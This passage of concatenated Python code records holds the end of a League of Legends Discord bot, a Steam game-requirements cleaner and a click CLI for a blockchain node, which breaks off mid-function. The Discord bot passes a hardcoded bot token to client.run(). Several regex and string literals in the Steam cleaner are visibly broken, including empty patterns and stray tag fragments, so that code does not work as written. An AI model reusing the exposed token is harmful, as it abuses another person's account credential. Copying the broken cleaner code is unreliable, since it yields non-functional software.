'sin'],\n 89: [\"Leona\", \"leona\", \"LEONA\"],\n 876: [\"Lillia\", \"lillia\", \"LILLIA\"],\n 127: [\"Lissandra\", \"lissandra\", \"LISSANDRA\", 'liss', 'lissandra'],\n 236: [\"Lucian\", \"lucian\", \"LUCIAN\"],\n 117: [\"Lulu\", \"lulu\", \"LULU\"],\n 99: [\"Lux\", \"lux\", \"LUX\"],\n 54: [\"Malphite\", \"malphite\", \"MALPHITE\", 'malpite', 'malfite', 'literalphite'],\n 90: [\"Malzahar\", \"malzahar\", \"MALZAHAR\"],\n 57: [\"Maokai\", \"maokai\", \"MAOKAI\"],\n 11: [\"MasterYi\", \"masteryi\", \"MASTERYI\"],\n 21: [\"MissFortune\", \"missfortune\", \"MISSFORTUNE\", 'miss', 'miss fortune', 'fortune'],\n 62: [\"MonkeyKing\", \"monkeyking\", \"MONKEYKING\", 'wukong', 'wu', 'wukong'],\n 82: [\"Mordekaiser\", \"mordekaiser\", \"MORDEKAISER\", 'mordecaiser'],\n 25: [\"Morgana\", \"morgana\", \"MORGANA\"],\n 267: [\"Nami\", \"nami\", \"NAMI\", 'namy'],\n 75: [\"Nasus\", \"nasus\", \"NASUS\"],\n 111: [\"Nautilus\", \"nautilus\", \"NAUTILUS\", 'nauti'],\n 518: [\"Neeko\", \"neeko\", \"NEEKO\", 'nico', 'niko', 'neeko'],\n 76: [\"Nidalee\", \"nidalee\", \"NIDALEE\", 'nidali'],\n 56: [\"Nocturne\", \"nocturne\", \"NOCTURNE\"],\n 20: [\"Nunu\", \"nunu\", \"NUNU\", 'nunu y willump'],\n 2: [\"Olaf\", \"olaf\", \"OLAF\"],\n 61: [\"Orianna\", \"orianna\", \"ORIANNA\"],\n 516: [\"Ornn\", \"ornn\", \"ORNN\"],\n 80: [\"Pantheon\", \"pantheon\", \"PANTHEON\"],\n 78: [\"Poppy\", \"poppy\", \"POPPY\"],\n 555: [\"Pyke\", \"pyke\", \"PYKE\"],\n 246: [\"Qiyana\", \"qiyana\", \"QIYANA\"],\n 133: [\"Quinn\", \"quinn\", \"QUINN\"],\n 497: [\"Rakan\", \"rakan\", \"RAKAN\"],\n 33: [\"Rammus\", \"rammus\", \"RAMMUS\", 'ramus'],\n 421: [\"RekSai\", \"reksai\", \"REKSAI\", 'rek sai', 'rek', 'sai'],\n 526: [\"Rell\", \"rell\", \"RELL\", 'rel'],\n 58: [\"Renekton\", \"renekton\", \"RENEKTON\", 'renek'],\n 107: [\"Rengar\", \"rengar\", \"RENGAR\"],\n 92: [\"Riven\", \"riven\", \"RIVEN\"],\n 68: [\"Rumble\", \"rumble\", \"RUMBLE\"],\n 13: [\"Ryze\", \"ryze\", \"RYZE\"],\n 360: [\"Samira\", \"samira\", \"SAMIRA\"],\n 113: [\"Sejuani\", \"sejuani\", \"SEJUANI\"],\n 235: [\"Senna\", \"senna\", \"SENNA\"],\n 147: [\"Seraphine\", \"seraphine\", \"SERAPHINE\"],\n 875: [\"Sett\", \"sett\", \"SETT\"],\n 35: [\"Shaco\", \"shaco\", 
\"SHACO\"],\n 98: [\"Shen\", \"shen\", \"SHEN\"],\n 102: [\"Shyvana\", \"shyvana\", \"SHYVANA\", 'shivana'],\n 27: [\"Singed\", \"singed\", \"SINGED\"],\n 14: [\"Sion\", \"sion\", \"SION\"],\n 15: [\"Sivir\", \"sivir\", \"SIVIR\"],\n 72: [\"Skarner\", \"skarner\", \"SKARNER\"],\n 37: [\"Sona\", \"sona\", \"SONA\"],\n 16: [\"Soraka\", \"soraka\", \"SORAKA\"],\n 50: [\"Swain\", \"swain\", \"SWAIN\"],\n 517: [\"Sylas\", \"sylas\", \"SYLAS\"],\n 134: [\"Syndra\", \"syndra\", \"SYNDRA\"],\n 223: [\"TahmKench\", \"tahmkench\", \"TAHMKENCH\", 'kench', 'kenc', 'quench', 'tham', 'tahm'],\n 163: [\"Taliyah\", \"taliyah\", \"TALIYAH\"],\n 91: [\"Talon\", \"talon\", \"TALON\"],\n 44: [\"Taric\", \"taric\", \"TARIC\"],\n 17: [\"Teemo\", \"teemo\", \"TEEMO\"],\n 412: [\"Thresh\", \"thresh\", \"THRESH\"],\n 18: [\"Tristana\", \"tristana\", \"TRISTANA\"],\n 48: [\"Trundle\", \"trundle\", \"TRUNDLE\"],\n 23: [\"Tryndamere\", \"tryndamere\", \"TRYNDAMERE\"],\n 4: [\"TwistedFate\", \"twistedfate\", \"TWISTEDFATE\"],\n 29: [\"Twitch\", \"twitch\", \"TWITCH\"],\n 77: [\"Udyr\", \"udyr\", \"UDYR\"],\n 6: [\"Urgot\", \"urgot\", \"URGOT\"],\n 110: [\"Varus\", \"varus\", \"VARUS\"],\n 67: [\"Vayne\", \"vayne\", \"VAYNE\"],\n 45: [\"Veigar\", \"veigar\", \"VEIGAR\"],\n 161: [\"Velkoz\", \"velkoz\", \"VELKOZ\", 'vel'],\n 254: [\"Vi\", \"vi\", \"VI\"],\n 234: [\"Viego\", \"viego\", \"VIEGO\"],\n 112: [\"Viktor\", \"viktor\", \"VIKTOR\"],\n 8: [\"Vladimir\", \"vladimir\", \"VLADIMIR\"],\n 106: [\"Volibear\", \"volibear\", \"VOLIBEAR\"],\n 19: [\"Warwick\", \"warwick\", \"WARWICK\"],\n 498: [\"Xayah\", \"xayah\", \"XAYAH\"],\n 101: [\"Xerath\", \"xerath\", \"XERATH\"],\n 5: [\"XinZhao\", \"xinzhao\", \"XINZHAO\"],\n 157: [\"Yasuo\", \"yasuo\", \"YASUO\"],\n 777: [\"Yone\", \"yone\", \"YONE\"],\n 83: [\"Yorick\", \"yorick\", \"YORICK\"],\n 350: [\"Yuumi\", \"yuumi\", \"YUUMI\"],\n 154: [\"Zac\", \"zac\", \"ZAC\"],\n 238: [\"Zed\", \"zed\", \"ZED\"],\n 115: [\"Ziggs\", \"ziggs\", \"ZIGGS\"],\n 26: [\"Zilean\", \"zilean\", \"ZILEAN\"],\n 142: [\"Zoe\", \"zoe\", \"ZOE\"],\n 143: [\"Zyra\", \"zyra\", \"ZYRA\"],\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\nrole_map = {\n 'TOP': ['top', 'toplane'],\n 'MIDDLE': ['mid', 'middle'],\n 'JUNGLE': ['jg', 'jungle', 'selva', 'jungla'],\n 'UTILITY': ['sup', 'supp', 'support', 'soporte'],\n 'BOTTOM': ['adc', 'adcarry', 'carry'],\n}\n\n\n@client.event\nasync def on_ready():\n print('bot ready')\n\n\nclass Consult:\n def __init__(self, champion, role=None):\n self.champion = champion\n self.role = role\n matches = ChampionData(df)\n champion_matches = matches.champion_data(self.champion, self.role)\n champion = ChampionBuild(champion_matches)\n self.mythic, self.core, self.final, self.starter, self.boots, self.primary_runes, self.secondary_runes, self.spell1, self.spell2, self.champion_name = champion.get_all_data()\n\n def make_all_info(self):\n if self.role is None:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image()\n else:\n image = Canvas(self.mythic, self.core, self.final, self.primary_runes, self.secondary_runes, self.champion,\n self.starter, self.boots, self.spell1, self.spell2)\n image.make_image(self.role)\n\n\ndef check_img(champion, rol=None):\n if rol is None:\n file = 
'all_info/popular_' + str(champion) + \".png\"\n        if os.path.isfile(file):\n            return file\n        else:\n            kayn = Consult(champion)\n            kayn.make_all_info()\n            return file\n\n    else:\n        file = 'all_info/popular_' + str(champion) + '_' + rol + \".png\"\n        if os.path.isfile(file):\n            return file\n        else:\n            kindred = Consult(champion, rol)\n            kindred.make_all_info()\n            return file\n\n\n@client.command(aliases=['allinfo', 'AllInfo'])\nasync def ai(ctx, champion, aux=None, aux1=None):\n    # if aux is None, the argument is just the champion, shown with its most popular role\n    champion = champion.lower()\n    if aux is None:\n        for value in champ_maps.values():\n            if champion in value:\n                champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n                file = check_img(champion, aux)\n                await ctx.send(file=discord.File(file))\n                break\n        print(champion)\n    # there are 3 possible options\n    # 1. aux is a role and aux1 is None: a one-word champion plus its role\n    # 2. aux is the second word of the champion and aux1 is None: a two-word champion with its popular role\n    # 3. aux is the second word of the champion and aux1 is its role: a two-word champion with a specific role\n    elif aux is not None and aux1 is None:  # this means either option 1 or 2\n        aux = aux.lower()\n\n        for value in champ_maps.values():\n            if aux in value:\n                aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n        if aux in role_map.keys():\n            # this means it is option 1\n            for value in champ_maps.values():\n                if champion in value:\n                    champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n                    break\n            file = check_img(champion, aux)\n            await ctx.send(file=discord.File(file))\n        elif type(aux) is int:\n            # this means it is option 2\n            file = check_img(aux)\n            await ctx.send(file=discord.File(file))\n        print(champion)\n\n    if aux is not None and aux1 is not None:\n        # this means option 3: resolve both champion words and the role\n\n        print('option3')\n        for value in champ_maps.values():\n            if champion in value:\n                champion = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n                break\n\n        for value in champ_maps.values():\n            if aux in value:\n                aux = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n\n        for value in champ_maps.values():\n            if aux1 in value:\n                aux1 = list(champ_maps.keys())[list(champ_maps.values()).index(value)]\n        if type(champion) is int and aux1 in role_map.keys():\n            print('make consult with champion and aux1')\n            file = check_img(champion, aux1)\n            print(file)\n            await ctx.send(file=discord.File(file))\n        elif type(aux) is int and aux1 in role_map.keys():\n            print('make consult with aux and aux1')\n            file = check_img(aux, aux1)\n            await ctx.send(file=discord.File(file))\n\n\nclient.run('ODQ3NDQ3ODQxMjM2MzIwMjU3.YK-NTg.8tuP_8K9qmRmC9kelmZ-Qiqwg2Y')\n","sub_path":"discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
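Every branch of the ai command above resolves a user token by scanning champ_maps.values(). Since the alias table is static, one could invert it once at startup and turn each lookup into a dictionary hit; alias_index and resolve below are hypothetical helpers, not part of the bot.

# Build the reverse index once; later lookups are O(1) instead of O(|champ_maps|).
alias_index = {}
for key, aliases in champ_maps.items():
    for alias in aliases:
        alias_index[alias.lower()] = key

def resolve(token):
    # Returns a champion id (int), a role key (str), or None if unknown.
    return alias_index.get(token.lower())

# resolve('blitz') -> 53, resolve('sup') -> 'UTILITY', resolve('xyz') -> None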
+{"seq_id":"163166466","text":"import re\n\n\ndef game_genre_category(game_data):\n\t\"\"\"\n\t\tArgs:\n\t\t\tgame_data: Scraped steam game data as dictionary\n\t\tReturn:\n\t\t\tAll game genres and categories.\n\t\"\"\"\n\ttry:\n\t\tgenres = game_data['genres']\n\texcept KeyError:\n\t\tgenres = []\n\n\ttry:\n\t\tcategories = game_data['categories']\n\texcept KeyError:\n\t\tcategories = []\n\n\tgame_themes = genres + categories\n\tif game_themes:\n\t\tget_themes = [theme['description'] for theme in game_themes]\n\t\tjoin_themes = ', '.join(get_themes)\n\t\treturn join_themes\n\treturn ''\n\n\ndef steam_minimum_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game minimum requirements\n\t\"\"\"\n\ttry:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall(\"OS:(.*?)\", raw_min)\n\t\tif not find_min:\n\t\t\tfind_min = re.findall(\"OS(.*?)\", raw_min)\n\t\t\tif not find_min:\n\t\t\t\tfind_min = re.findall(':(.*?)', raw_min + '')\n\t\trequirements = '- OS:' + find_min[0] + \"
\"\n\n\t\treturn requirements\n\n\texcept:\n\t\traw_min = raw_requirement.replace('\\n', '').replace('\\t', '')\n\t\tfind_min = re.findall('', raw_min)\n\t\treplace_min = '' + find_min[0].replace(' class=\"bb_ul\">', '') + '
'\n\t\trequirements = replace_min\n\n\t\treturn requirements\n\n\ndef steam_max_requirements(raw_requirement):\n\t\"\"\"\n\t\tclean steam game maximum requirements\n\t\"\"\"\n\ttry:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + '
'\n\t\tfind_max = re.findall(\"OS:(.*?)\", raw_max)\n\t\tif not find_max:\n\t\t\tfind_max = re.findall(\"OS(.*?)\", raw_max)\n\t\t\tif not find_max:\n\t\t\t\tfind_max = re.findall(':(.*?)', raw_max + '')\n\t\tmax_req = '- OS:' + find_max[0] + \"
\"\n\n\t\treturn max_req\n\n\texcept:\n\t\traw_max = raw_requirement.replace('\\n', '').replace('\\t', '') + ''\n\t\tfind_max = re.findall('', raw_max)\n\t\treplace_max = '' + find_max[0].replace(' class=\"bb_ul\">', '') \n\t\tmax_req = replace_max\n\n\t\treturn max_req\n\n\ndef game_file_size(raw_requirement):\n\t\"\"\"\n\t\tReturn : Use and convert file size to G (Gigabytes).\n\t\"\"\"\n\tstring_gigabytes = ['hard drive', 'storage', 'hdd', 'hard disk', 'disk space']\n\tif raw_requirement:\n\t\tsplit_requirement = raw_requirement.split('')\n\t\tfor requirement in split_requirement:\n\t\t\trequirement = requirement.lower().replace('+', '').replace('at least', '')\n\t\t\tfor size in string_gigabytes:\n\t\t\t\tif size in requirement and 'gb' in requirement:\n\t\t\t\t\trequired_space = re.findall(r'\\d+', requirement)\n\t\t\t\t\tspace = float('.'.join(required_space))\n\t\t\t\t\treturn space * 1000\n\n\t\t\t\tif size in requirement and 'mb' in requirement:\n\t\t\t\t\trequired_space = re.findall(r'\\d+', requirement)\n\t\t\t\t\tspace = float('.'.join(required_space))\n\t\t\t\t\treturn space * 1\n\treturn 0\n","sub_path":"steam_data_cleaner.py","file_name":"steam_data_cleaner.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
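game_file_size in the record above collects every digit run and joins them with a dot, which happens to work for '1,5 GB' but misreads requirement strings that contain several numbers (e.g. 'Windows 10, 20 GB'). A tighter sketch that anchors the number to its unit, mirroring the record's GB to MB x 1000 convention (storage_mb_sketch is a hypothetical name):

import re

def storage_mb_sketch(text):
    # Capture one 'number + unit' pair such as '10 GB' or '500 MB'.
    match = re.search(r'(\d+(?:[.,]\d+)?)\s*(gb|mb)', text.lower())
    if not match:
        return 0.0
    value = float(match.group(1).replace(',', '.'))
    return value * 1000 if match.group(2) == 'gb' else value

print(storage_mb_sketch('Storage: 1,5 GB available space'))  # 1500.0
print(storage_mb_sketch('Hard Drive: 500 MB'))               # 500.0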
+{"seq_id":"584473288","text":"import click\nfrom rrc.main.node import Node\nfrom rrc.main.networking import Networking\nfrom rrc.main.computing import Computing\nfrom rrc.main.storing import *\nimport getpass\nimport docker\nfrom . import *\nfrom rrc import __version__ as _version\nfrom rrc import _debug as _debug\n\n@click.group()\ndef cmd():\n pass\n\n@cmd.command()\n@click.option('--file', default=None, help=\"Compute the SHA256 digest of a file.\")\ndef digest(file):\n if file:\n print(\"SHA-256 digest: {0}\".format(sha256_digest(file)))\n\n@cmd.command()\ndef version():\n print(\"RRC version {0} in use.\".format(_version))\n\n@cmd.command()\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\n@click.option('--clean/--no-clean', default=None, help=\"Delete all the blocks.\")\ndef block(debug, clean): # show the lask block in the blockchain for now.\n if debug:\n _debug = True\n\n storing = Storing()\n networking = Networking()\n computing = Computing()\n networking.link_storage(storing)\n computing.link_storage(storing)\n net_pub = networking.network_pub()\n\n session = storing.hook(\"Node\")\n current_node = session.query(Instance).first()\n if current_node and not current_node.localhost:\n networking.connect()\n storing.connect()\n storing.release(\"Node\")\n\n # To hide for production.\n # Never allow this even in localhost dev test.\n if clean:\n sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n if sure.lower() == \"y\":\n session = storing.hook(\"Node\")\n blks = session.query(Block).all()\n for blk in blks:\n session.delete(blk)\n session.commit()\n storing.release(\"Node\")\n xprint(\"Node\", \"warn\", \"All Blocks removed.\")\n elif sure.lower() == \"n\":\n xprint('Node', 'warn', 'Well understood. Cheers!')\n else:\n xprint('Node', 'warn', 'Warning: Unknown answer. 
(y)es/(n)o.')\n    else:\n        storing = Storing()\n        networking = Networking()\n        computing = Computing()\n        networking.link_storage(storing)\n        computing.link_storage(storing)\n        net_pub = networking.network_pub()\n\n        session = storing.hook(\"Node\")\n        current_node = session.query(Instance).first()\n        if current_node and not current_node.localhost:\n            networking.connect()\n            storing.connect()\n        storing.release(\"Node\")\n\n        if networking.connected():\n            xprint(\"Node\", \"warn\", \"Warning: We do not support showing the last block from the network for now.\")\n        else:\n            session = storing.hook(\"Node\")\n            last_blk = session.query(Block).filter(Block.last == True).first()\n            if last_blk:\n                xprint(\"Node\", \"inf\", \"Last Block: \\n{0}\".format(last_blk))\n            else:\n                xprint(\"Node\", \"inf\", \"The blockchain is currently empty.\")\n            storing.release(\"Node\")\n\n# add a clean up command to wipe the .lock just in case something is messed up.\n# Also in exceptions try to always release the lock.\n# Finally for forced terminations, make sure to place a callback to cleanup the lock.\n@cmd.command()\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef unlock(debug):\n    if debug:\n        _debug = True\n    xprint('Node', 'deb', 'Entering the cli unlock command...')\n    xprint('Node', 'tip', 'Only do this when one component did not release the storing lock properly.')\n    xprint('Node', 'tip', 'The current deadlock is preventing the whole node from running properly.')\n    xprint('Node', 'warn', 'Warning: This will force the removal of the current lock on storing.')\n    xprint('Node', 'warn', 'Warning: Doing this can cause irreversible harm to your storage integrity.')\n    xprint('Node', 'warn', 'Warning: Ensure that no component is actively using the current lock.')\n    sure = input(\"Do you really want to proceed: (y)es | (n)o ? \")\n    if sure.lower() == \"y\":\n        storing = Storing()\n        storing.unlock()\n    elif sure.lower() == \"n\":\n        xprint('Node', 'warn', 'Well understood. Cheers!')\n    else:\n        xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o.')\n\n\n@cmd.command()\n# Summary of the network:\n# - Check that we can connect to it.\n# - Show a map of the network nodes. 
Total, by continent, by country.\n# - Show the number of computations run so far.\n# - Show the amount of rewards generated so far.\n# - Show the price of a reward.\n# - Says if the current node is connected or disconnected from the network.\n# - Says what is the state of current node: Behind the network, synching or up to date.\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the RRC network.\")\n@click.option('--price/--no-price', default=None, help=\"The current price of 1 RRC in different exchanges.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef network(summary, price, debug):\n    if debug:\n        _debug = True\n    xprint('Node', 'deb', 'Entering the cli network command...')\n    storing = Storing()\n    networking = Networking()\n\n    net_pub = networking.network_pub()\n    if net_pub:\n        storing.network_pub(net_pub)\n    else:\n        xprint('Node', 'err', 'Error: Cannot reach the RRC network.')\n        xprint('Node', 'warn', 'Warning: Requests to the network will most likely fail.')\n        xprint('Node', 'inf', 'Tip: Please check that you have a reliable internet connection.')\n        return\n\n    session = storing.hook(\"Node\")\n    current_node = session.query(Instance).first()\n    storing.release(\"Node\")\n    if current_node is None:\n        xprint('Node', 'err', 'Error: You must configure the node before using this command\\'s features.')\n        xprint('Node', 'inf', 'Tip: rrc node --config')\n        return\n    else:\n        if summary:\n            response = networking.network_summary()\n            if response:\n                xprint('Node', 'deb', ' Network summary\\n')\n                xprint(json.dumps(response, sort_keys=True, indent=4))\n\n        if price:\n            response = networking.network_price()\n            if response:\n                xprint('Node', 'deb', 'RRC Network >> Price\\n')\n                xprint(json.dumps(response, sort_keys=True, indent=4))\n\n@cmd.command()\n@click.option('--setup/--no-setup', default=None, help=\"Setup the node ownership.\")\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the node ownership information.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef owner(setup, summary, debug):\n    if debug:\n        _debug = True\n    xprint('Node', 'deb', 'Entering the cli owner command...')\n    storing = Storing()\n    if setup:\n        xprint('Node', 'inf', 'Setting up Node\\'s owner credentials')\n        email = input('email on CoRR: ')\n        session = storing.hook(\"Node\")\n        instance_owner = Owner(email=email, rewards=0.0)\n        session.add(instance_owner)\n        session.commit()\n        storing.release(\"Node\")\n\n    if summary:\n        session = storing.hook(\"Node\")\n        instance_owner = session.query(Owner).first()\n        if instance_owner:\n            xprint('Node', 'inf', '\\n{0}'.format(instance_owner))\n        else:\n            xprint('Node', 'err', 'Error: No owner setup for this node.')\n            xprint('Node', 'inf', 'Tip: You must set up the node owner for this to work.')\n            xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n            xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n            xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n        storing.release(\"Node\")\n\n@cmd.command()\n@click.option('--config/--no-config', default=None, help=\"Configure the node.\")\n@click.option('--summary/--no-summary', default=None, help=\"The summary of the node instance.\")\n@click.option('--start/--no-start', default=None, help=\"Start the node instance.\")\n@click.option('--stop/--no-stop', default=None, help=\"Stop the node instance.\")\n@click.option('--network/--no-network', default=None, 
help=\"Configure the node to be connected to the network.\")\n@click.option('--debug/--no-debug', default=None, help=\"Show debug logs.\")\ndef node(config, summary, start, stop, network, debug):\n    if debug:\n        _debug = True\n\n    xprint('Node', 'deb', 'RRC Node >> Entering the cli node command...')\n    storing = Storing()\n    networking = Networking()\n    computing = Computing()\n    networking.link_storage(storing)\n    computing.link_storage(storing)\n    net_pub = networking.network_pub()\n\n    session = storing.hook(\"Node\")\n    current_node = session.query(Instance).first()\n    if current_node and not current_node.localhost:\n        networking.connect()\n        storing.connect()\n    storing.release(\"Node\")\n\n    if net_pub:\n        storing.network_pub(net_pub)\n    else:\n        xprint('Node', 'err', 'Error: Cannot reach the RRC network.')\n        xprint('Node', 'warn', 'Warning: Requests to the network will most likely fail.')\n        xprint('Node', 'inf', 'Tip: Please check that you have a reliable internet connection.')\n\n    if summary:\n        session = storing.hook(\"Node\")\n        instance = session.query(Instance).first()\n        if instance:\n            xprint('Node', 'inf', '\\n{0}'.format(instance))\n        else:\n            xprint('Node', 'err', 'Error: You must configure the node before using this command\\'s features.')\n            xprint('Node', 'inf', 'Tip: rrc node --config')\n        storing.release(\"Node\")\n\n    if config:\n        # Check if the owner is sure to reconfigure the node again before continuing.\n        xprint('Node', 'warn', 'Warning: The following action will reset your current setup.')\n        go_on = input(\"Are you sure about this: y(es) | n(o) ? \")\n        counter = 0\n        while go_on.lower() not in [\"y\", \"n\"]:\n            counter += 1\n            xprint('Node', 'warn', 'Warning: Unknown answer. (y)es/(n)o. Attempt({0}/5)'.format(counter))\n            go_on = input(\"Are you sure about this: y(es) | n(o) ? \")\n            if counter == 5:\n                break\n        if counter == 5:\n            xprint('Node', 'warn', 'Warning: Maximum attempts reached. Cheers!')\n            return\n        else:\n            if go_on.lower() == \"n\":\n                xprint('Node', 'warn', 'Well understood. 
Cheers!')\n                return\n        storing.generate_rsa()\n        storing.rsa_private()\n        storing.rsa_public()\n\n        session = storing.hook(\"Node\")\n        current_node = session.query(Instance).first()\n        if current_node:\n            session.delete(current_node)\n        current_node = Instance(version=_version, identifier=storing.signature_node(), session=\"unknown\", localhost=True, status=\"config\", rewards=0.0)\n        session.add(current_node)\n        session.commit()\n        current_owner = session.query(Owner).first()\n        if current_owner:\n            response = networking.node_configure(current_owner.email)\n            if response:\n                xprint('Node', 'inf', 'Network Handshake success!')\n            else:\n                xprint('Node', 'err', 'Error: Could not achieve a proper handshake with the RRC network.')\n                xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n        else:\n            xprint('Node', 'warn', 'Warning: No owner setup for this node.')\n            xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n            xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n            xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n\n        storing.release(\"Node\")\n    else:\n        session = storing.hook(\"Node\")\n        current_node = session.query(Instance).first()\n        if current_node is None:\n            storing.release(\"Node\")\n            xprint('Node', 'err', 'Error: You must configure the node before using this command\\'s features.')\n            xprint('Node', 'inf', 'Tip: rrc node --config.')\n            xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n            xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n            return\n        else:\n            storing.rsa_private()\n            storing.rsa_public()\n\n            current_owner = session.query(Owner).first()\n            if current_owner:\n                response = networking.node_configure(current_owner.email)\n                if response:\n                    xprint('Node', 'inf', 'Network Handshake success!')\n                else:\n                    xprint('Node', 'err', 'Error: Could not achieve a proper handshake with the RRC network.')\n                    xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n            else:\n                xprint('Node', 'warn', 'Warning: No owner setup for this node.')\n                xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n                xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n                xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n            storing.release(\"Node\")\n\n    if network:\n        session = storing.hook(\"Node\")\n        current_node = session.query(Instance).first()\n        history = session.query(History).all()\n        if current_node:\n            if len(history) > 0 and current_node.localhost:\n                storing.release(\"Node\")\n                xprint('Node', 'err', 'Error: Previous localhost configuration found on the system.')\n                xprint('Node', 'inf', 'Tip: Reconfigure the node with --network to proceed.')\n                override = input(\"Unless you want to erase the current configuration: (y)es | (n)o ? \")\n                if override.lower() == \"y\":\n                    current_node.localhost = False\n                    for hst in history:\n                        session.delete(hst)\n                    for qu in session.query(Queu).all():\n                        session.delete(qu)\n                    for cnt in session.query(Contract).all():\n                        session.delete(cnt)\n                    for lg in session.query(Log).all():\n                        session.delete(lg)\n                    session.commit()\n                elif override.lower() == \"n\":\n                    storing.release(\"Node\")\n                    xprint('Node', 'warn', 'Well understood. Cheers!')\n                    return\n                else:\n                    storing.release(\"Node\")\n                    xprint('Node', 'warn', 'Warning: Unknown answer. 
(y)es/(n)o.')\n                    return\n            else:\n                current_node.localhost = False\n                session.commit()\n                storing.release(\"Node\")\n        session = storing.hook(\"Node\")\n        current_owner = session.query(Owner).first()\n        if current_owner is None:\n            storing.release(\"Node\")\n            xprint('Node', 'err', 'Error: No owner setup for this node.')\n            xprint('Node', 'inf', 'Tip: Please setup the node owner before attempting (1).')\n            xprint('Node', 'inf', 'Tip: to configure it over the RRC network (2).')\n            xprint('Node', 'inf', 'Tip: rrc owner --setup.')\n            xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n            xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n            return\n        else:\n            storing.release(\"Node\")\n            networking.connect()\n            storing.connect()\n    else:\n        session = storing.hook(\"Node\")\n        current_node = session.query(Instance).first()\n        history = session.query(History).all()\n        if len(history) > 0 and not current_node.localhost:\n            storing.release(\"Node\")\n            xprint('Node', 'err', 'Error: Previous non-localhost configuration found on the system.')\n            xprint('Node', 'inf', 'Tip: Reconfigure the node without --network to proceed.')\n            override = input(\"Unless you want to erase the current configuration: (y)es | (n)o ? \")\n            if override.lower() == \"y\":\n                current_node.localhost = True\n                for hst in history:\n                    session.delete(hst)\n                for qu in session.query(Queu).all():\n                    session.delete(qu)\n                for cnt in session.query(Contract).all():\n                    session.delete(cnt)\n                for lg in session.query(Log).all():\n                    session.delete(lg)\n                session.commit()\n                storing.release(\"Node\")\n            else:\n                storing.release(\"Node\")\n                xprint('Node', 'warn', 'Well understood. Cheers!')\n                return\n        else:\n            if not current_node.localhost:\n                networking.connect()\n                storing.connect()\n                xprint('Node', 'deb', 'Network Connected!')\n            storing.release(\"Node\")\n\n    if start:\n        if networking.connected():\n            session = storing.hook(\"Node\")\n            instance_owner = session.query(Owner).first()\n            owner = None\n            if instance_owner is None:\n                xprint('Node', 'err', 'Error: No owner setup found for this node.')\n                xprint('Node', 'inf', 'Tip: Please setup the node owner before attempting (1).')\n                xprint('Node', 'inf', 'Tip: to configure it over the RRC network (2).')\n                xprint('Node', 'warn', 'Warning: You will not be able to call network commands [\\'summary\\', \\'price\\']')\n                xprint('Node', 'inf', 'Tip: Setup the node owner if you plan to reach the network.')\n                storing.release(\"Node\")\n                return\n            else:\n                owner = instance_owner.email\n            storing.release(\"Node\")\n\n            xprint('Node', 'warn', 'Warning: Node Owner [{0}] credentials required here.'.format(instance_owner.email))\n            password1 = getpass.getpass('password on CoRR: ')\n            password2 = getpass.getpass('again on CoRR: ')\n            counter = 0\n            while password1 != password2:\n                counter += 1\n                xprint('Node', 'err', 'Error: Password Mismatch! Attempt({0})'.format(counter))\n                password1 = getpass.getpass('password on CoRR: ')\n                password2 = getpass.getpass('again on CoRR: ')\n\n                if counter == 5:\n                    break\n            if counter == 5:\n                xprint('Node', 'warn', 'Warning: Maximum attempts reached. 
